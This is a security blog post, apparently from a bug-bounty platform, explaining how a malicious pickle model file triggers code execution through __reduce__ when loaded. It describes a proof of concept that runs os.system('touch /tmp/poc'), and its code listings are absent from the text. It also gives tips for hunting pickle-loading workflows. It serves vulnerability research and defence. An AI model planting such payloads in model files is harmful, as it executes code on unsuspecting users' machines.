Pkl Rick’d: How Loading a .pkl File Can Lead to RCE

Written by Madison Vorbrich | Apr 9, 2025 6:28:04 PM

Sometimes the simplest bugs are the most dangerous — especially when they’ve been hiding in plain sight.

This one’s a classic pattern: pickle.load() + unsafe deserialization = RCE.

Let’s unpack a clean, minimal Model File Vulnerability (MFV) where a malicious .pkl file executes code the moment it's loaded. No edge cases, no extra steps — just Python doing Python things.

The Vulnerability Explained

This one lives in the wide-open serialization mechanism that is Python’s built-in pickle module. If you’ve ever used pickle.dump() to save a model (or any object), and pickle.load() to bring it back — congrats, you’ve opened the door to arbitrary code execution.

Here’s why: pickle.load() doesn’t just deserialize data — it runs code. Specifically, it’ll call the __reduce__() method on any object being unpickled.

And guess what? That method can return basically anything — including a tuple that tells Python: “hey, go ahead and run os.system('touch /tmp/poc') real quick.”

Proof of Concept (PoC)

Here's a step-by-step demonstration of how this vulnerability can be exploited. You can find the full, working PoC in this Google Colab notebook.

Here's the breakdown:

1. Craft the payload

We start by defining a class that overrides the __reduce__() method. Instead of returning instructions to recreate the object, it returns a system command:

This instructs pickle to execute os.system("touch /tmp/poc") when the object is deserialized.

2. Serialize the payload

We use pickle.dumps() to serialize the object and write it to a file:

3. Simulate the victim loading the model

Now, a victim simply loading this pickle file will unknowingly execute the payload:

At this point, /tmp/poc will be created on the victim’s machine — proof that the system command was executed.

Why This Matters for MFV Huntrs

This is a textbook MFV: code execution via a malicious model artifact.

Here’s what makes it a great pattern to hunt for:

Framework-agnostic: This isn’t about TensorFlow or PyTorch. This is core Python. If a project uses .pkl to save or load models, it’s potentially vulnerable.
Stupid simple: You don’t need to reverse engineer a binary format or fuzz some weird parser. Just subclass __reduce__ and you’re good. Get that bounty!

Tips for Finding Similar MFVs

🔍 Look for:

Calls to pickle.load(), pickle.loads(), or anything using Pickle/HDF5/pickle-based formats
ML libraries that save or share .pkl model files
Tutorials or notebooks that tell users to "just load this .pkl"

If you can control the file, and it gets loaded — game on.

Wrapping Up

Sometimes the oldest bugs are still the juiciest. This report shows that even basic deserialization in Python can be a huge attack vector if model files aren’t handled securely.

If you're hunting MFVs, focus on deserialization workflows — especially where objects are reconstructed dynamically without validation. That’s often where execution paths get exposed. Happy hunting!

View full post